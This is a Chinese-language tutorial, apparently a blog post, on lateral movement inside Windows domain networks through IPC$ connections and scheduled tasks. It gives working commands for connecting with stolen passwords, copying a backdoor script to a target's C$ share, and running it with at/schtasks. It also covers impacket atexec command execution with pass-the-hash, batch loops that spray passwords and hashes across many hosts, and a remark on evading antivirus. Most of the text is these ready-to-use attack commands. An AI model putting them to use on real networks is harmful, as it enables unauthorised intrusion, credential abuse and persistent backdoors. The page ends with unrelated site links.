内网渗透-横向移动

#建立ipc连接并将后门添加至计划任务

前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典

本次移动流程:尝试建立连接(ipc)->创建计划任务(at|schtasks)->执行命令,上传后门

什么是IPC?

IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

#建立ipc常见错误代码

5:拒绝访问,可能需要提权

52:网络问题

53:端口未开放,未开机,防火墙拦截

67:本地lanmanworkstation服务未启动,目标删除了ipc$

1219:提供的凭据和已存在的凭据集冲突,说明已经建立ipc$,需要先删除

1326:账号密码错误

1792:目标NetLogon服务未启动

2242:用户密码过期,目标有账号策略,强制定期更改密码

#失败的原因

目标系统不是NT或者以上的操作系统

对方没有打开ipc$

139 445端口未开启或被拦截

输出命令,账号密码错误

建立ipc连接利用流程
1.建立ipc链接到目标主机(前提主机开放135 445端口)

工作组环境:

net use \\192.168.xx.xx\ipc$ "password" /user:"administrator"

域内环境:

net use \\192.168.xx.xx\ipc$ "password" /user:xxx.com\"administrator"
2.拷贝要执行的命令脚本到目标主机
copy \\192.168.xx.xx\c$\1.bat 1.bat

copy 1.bat \\192.168.xx.xx\c$ dir \\192.168.x.xx\c$\ #查看目标主机文件
3.查看目标时间,创建计划任务(at,schtasks)定时执行拷贝到的脚本
net time \\192.168.xx.xx #查看时间

at在windows版本小于2012下使用

at \\192.168.xx.xx 15:32 c:\1.bat   #在15:32执行c盘下的1.bat

schtasks 在windows版本大于等于windows2012下使用

shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本

schtasks  /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务

schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务
4.删除ipc连接
net use \\192.168.xx.xx\ipc$ /delete

net view xx.xx.xx.xx #查看对方共享

#利用atexec-impacket进行明文或hash传递

atexec.exe ./administrator:Admin12345@192.168.xx.xx "whoami" #连接本地用户administrator

atexec.exe xxx.com/administrator:Admin12345@192.168.xx.xx "whoami" #连接域用户administrator

atexec.exe -hashes:xxx ./administrator@192.168.xx.xx "whoami" #连接本地用户administrator并进行hash传递执行whoami命令
 

缺点:由于是第三方工具容易被拦截,需要做免杀处理

#批量利用

#bat批处理命令
For /F %%i in (ips.txt) do net use \\%%i\ipc$ "password" /user:administrator
#单个密码尝试连接多个主机

For /F %%i in(ips.txt) do atexec.exe xxx.com/administrator:password@%%i whoami
#调用atexec.exe用单个密码尝试连接多个主机

For /F %%i in (pass.txt) do atexec.exe xxx.com/administrator:%%i@192.168.xx.xx whoami
##调用atexec.exe用多个密码尝试连接单个主机

For /F %%i in (hash.txt) do atexec.exe -hashes:%%i xxx.com/administrator@192.168.xx.xx whoami
##调用atexec.exe用多个HASH尝试连接单个主机
 

内网渗透-横向移动($IPC&at&schtasks)的更多相关文章

  1. 4. 内网渗透之IPC$入侵

    IPC$连接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限 ...

  2. 内网渗透之IPC,远程执行

    开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "&qu ...

  3. [原创]K8 Cscan 3.6大型内网渗透自定义扫描器

    前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...

  4. 内网渗透技巧:判断机器真实外网IP的5种方法总结

    在内网渗透中有时需要在某台WEB服务器中留下后门,该机器可以通过内网IP建立IPC连接,但还需要获知外网IP或域名才能访问Wbshell,在无网关权限的情况下,我总结了有如下方法: 1.通过nsloo ...

  5. 5.内网渗透之PTH&PTT&PTK

    ---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...

  6. 内网渗透 - 提权 - Windows

    MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...

  7. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  8. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  9. 内网渗透 关于GPO

    网上有很多讲内网渗透的文章,但看来看去还是一老外的博客给力,博客地址:www.harmj0y.net/blog,看完就明白这里面的很多思路都非常好. 做内网时,有时会碰到目标的机器开防火墙,所有端口基 ...

随机推荐

  1. Android Studio 安装及配置

    安装时的那些事 •相关链接 [1]:无需翻墙的链接 [2]:Android Studio 安装教程 •从安装到放弃??? 初次接触 Android,并知道了开发 Android APP 的软件--An ...

  2. Mybatis自定义拦截器与插件开发

    在Spring中我们经常会使用到拦截器,在登录验证.日志记录.性能监控等场景中,通过使用拦截器允许我们在不改动业务代码的情况下,执行拦截器的方法来增强现有的逻辑.在mybatis中,同样也有这样的业务 ...

  3. 最小生成树,Prim和Kruskal的原理与实现

    文章首先于微信公众号:小K算法,关注第一时间获取更新信息 1 新农村建设 大清都亡了,我们村还没有通网.为了响应国家的新农村建设的号召,村里也开始了网络工程的建设. 穷乡僻壤,人烟稀少,如何布局网线, ...

  4. Nacos概述及安装

    Nacos是什么? 在Spring Cloud中我们使用eureka.consul等做为服务注册中心,使用Spring Cloud Config做为配置中心.而Spring Cloud中,也可以使用n ...

  5. Spring MVC(七篇)

    (一)Spring MVC简介 (二)SpringMVC核心控制器 (三)Spring MVC Controller接口控制器详解(一) (三)Spring MVC Controller接口控制器详解 ...

  6. CMD控制台(命令提示符)的打开方式

    打开CMD的方式 打开+系统+命令提示符 Win键 +R 输入cmd 打开控制台(推荐使用) 在任意的文件夹下面,按住shift键+鼠标右键点击+在此处打开命令行窗口 资源管理器的地址栏前面加上cmd ...

  7. OAuth2.0理解和用法

    现在网络的资料到处都是,很容易搜索到自己想要的答案.但答案通常只能解决自己一部分的问题.如果自己想要有一套自己的解决方案,还得重新撸一遍靠谱. 我需要学下OAuth2.0吗? 没看之前以为OAuth2 ...

  8. 基于sinc的音频重采样(二):实现

    上篇(基于sinc的音频重采样(一):原理)讲了基于sinc方法的重采样原理,并给出了数学表达式,如下:                  (1) 本文讲如何基于这个数学表达式来做软件实现.软件实现的 ...

  9. Tony老师带你来看Java设计模式:代理模式

    目录 定义 作用 意图 主要解决问题 优缺点 与装饰者模式的区别 结构 从Tony老师来看实现方式 静态代理 动态代理 JDK动态代理的实现 cglib动态代理的实现 定义 为其他对象提供一种代理来控 ...

  10. Java编程语言学习01-编写第1个Java程序

    JVM/JRE/JDK JVMJava虚拟机(Java Virtual Machine)它是运行所有Java程序的虚拟计算机有的java程序会首先被编译为.class的类文件,这种类文件可以在虚拟机上 ...